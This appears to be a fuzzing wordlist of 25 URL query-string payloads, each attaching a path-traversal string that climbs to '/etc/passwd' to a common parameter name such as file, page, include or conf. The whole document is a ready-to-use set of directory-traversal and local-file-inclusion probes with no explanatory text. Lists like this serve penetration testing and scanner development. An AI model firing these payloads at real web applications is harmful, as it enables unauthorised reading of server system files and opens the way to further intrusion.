?cat=../../../../../../etc/passwd
?dir=../../../../../../etc/passwd
?action=../../../../../../etc/passwd
?board=../../../../../../etc/passwd
?date=../../../../../../etc/passwd
?detail=../../../../../../etc/passwd
?file=../../../../../../etc/passwd
?download=../../../../../../etc/passwd
?path=../../../../../../etc/passwd
?folder=../../../../../../etc/passwd
?prefix=../../../../../../etc/passwd
?include=../../../../../../etc/passwd
?page=../../../../../../etc/passwd
?inc=../../../../../../etc/passwd
?locate=../../../../../../etc/passwd
?show=../../../../../../etc/passwd
?doc=../../../../../../etc/passwd
?site=../../../../../../etc/passwd
?type=../../../../../../etc/passwd
?view=../../../../../../etc/passwd
?content=../../../../../../etc/passwd
?document=../../../../../../etc/passwd
?layout=../../../../../../etc/passwd
?mod=../../../../../../etc/passwd
?conf=../../../../../../etc/passwd
